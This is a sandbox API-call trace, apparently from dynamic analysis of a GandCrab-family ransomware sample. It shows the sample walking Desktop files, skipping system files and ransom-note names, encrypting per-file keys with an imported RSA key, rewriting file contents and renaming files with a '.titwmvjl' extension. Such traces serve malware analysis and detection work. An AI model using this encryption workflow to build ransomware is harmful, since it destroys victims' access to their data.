[0087.530] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.530] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.530] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.531] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.531] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.531] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.532] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503638) returned 1 [0087.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.533] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.533] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.533] GetLastError () returned 0x0 [0087.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.533] CryptDestroyKey (hKey=0x503638) returned 1 [0087.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.533] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.533] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.535] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037f8) returned 1 [0087.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.535] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.535] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.535] GetLastError () returned 0x0 [0087.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.535] CryptDestroyKey (hKey=0x5037f8) returned 1 [0087.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.536] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.536] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.536] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.536] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xe55b, lpOverlapped=0x0) returned 1 [0088.264] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff1aa5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.265] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe55b, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xe55b, lpOverlapped=0x0) returned 1 [0088.267] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.267] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0088.269] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.272] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.272] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.273] CloseHandle (hObject=0x2ac) returned 1 [0088.273] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a0bcx0.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a0bcx0.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0088.274] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.274] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.274] lstrcmpW (lpString1="AzOBY.swf", lpString2=".") returned 1 [0088.274] lstrcmpW (lpString1="AzOBY.swf", lpString2="..") returned 1 [0088.274] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="AzOBY.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf" [0088.274] lstrlenW (lpString=".titwmvjl") returned 9 [0088.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf") returned 39 [0088.274] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.274] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf.titwmvjl") returned 48 [0088.274] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf") returned 39 [0088.274] lstrlenW (lpString=".swf") returned 4 [0088.274] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.275] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0088.275] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0088.275] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf") returned 39 [0088.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf") returned 39 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="desktop.ini") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="autorun.inf") returned 1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="ntuser.dat") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="iconcache.db") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="bootsect.bak") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="boot.ini") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="ntuser.dat.log") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="thumbs.db") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="CRAB-DECRYPT.html") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="ntldr") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="NTDETECT.COM") returned -1 [0088.275] lstrcmpiW (lpString1="AzOBY.swf", lpString2="Bootfont.bin") returned -1 [0088.275] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf") returned 39 [0088.275] lstrlenW (lpString=".swf") returned 4 [0088.275] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.275] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0088.275] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.276] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.276] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\azoby.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0088.276] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.276] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0088.277] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.277] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.277] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.278] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.278] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.278] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.278] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0088.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.279] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.279] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.279] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.279] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.280] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.280] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.280] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.280] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0088.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.280] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.280] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.281] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.282] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503938) returned 1 [0088.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.282] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.283] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.283] GetLastError () returned 0x0 [0088.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.283] CryptDestroyKey (hKey=0x503938) returned 1 [0088.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.283] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.283] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.283] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.284] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0088.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.285] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.285] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.285] GetLastError () returned 0x0 [0088.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.285] CryptDestroyKey (hKey=0x5036f8) returned 1 [0088.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.285] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.285] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.285] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.286] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xc44f, lpOverlapped=0x0) returned 1 [0088.292] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff3bb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.292] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc44f, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xc44f, lpOverlapped=0x0) returned 1 [0088.293] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.293] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0088.294] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.298] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.298] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.299] CloseHandle (hObject=0x2ac) returned 1 [0088.299] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\azoby.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\AzOBY.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\azoby.swf.titwmvjl"), dwFlags=0x1) returned 1 [0088.300] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.300] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.300] lstrcmpW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2=".") returned 1 [0088.300] lstrcmpW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="..") returned 1 [0088.300] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="ckyl-mx28Ax_IC5.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3" [0088.300] lstrlenW (lpString=".titwmvjl") returned 9 [0088.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3") returned 49 [0088.300] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.300] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3.titwmvjl") returned 58 [0088.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3") returned 49 [0088.300] lstrlenW (lpString=".mp3") returned 4 [0088.300] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.301] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0088.301] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0088.301] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3") returned 49 [0088.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3") returned 49 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="desktop.ini") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="autorun.inf") returned 1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="ntuser.dat") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="iconcache.db") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="bootsect.bak") returned 1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="boot.ini") returned 1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="ntuser.dat.log") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="thumbs.db") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="CRAB-DECRYPT.html") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="ntldr") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="NTDETECT.COM") returned -1 [0088.301] lstrcmpiW (lpString1="ckyl-mx28Ax_IC5.mp3", lpString2="Bootfont.bin") returned 1 [0088.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3") returned 49 [0088.301] lstrlenW (lpString=".mp3") returned 4 [0088.301] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.301] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0088.301] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.302] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.302] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ckyl-mx28ax_ic5.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0088.302] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.302] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0088.303] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.303] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.304] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.305] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.305] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.305] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0088.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.305] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.305] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.305] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.306] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.306] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.307] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.307] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0088.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.307] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.307] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.307] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.308] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0088.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.309] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.309] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.309] GetLastError () returned 0x0 [0088.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.309] CryptDestroyKey (hKey=0x5035b8) returned 1 [0088.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.309] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.309] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.311] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0088.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.311] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.311] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 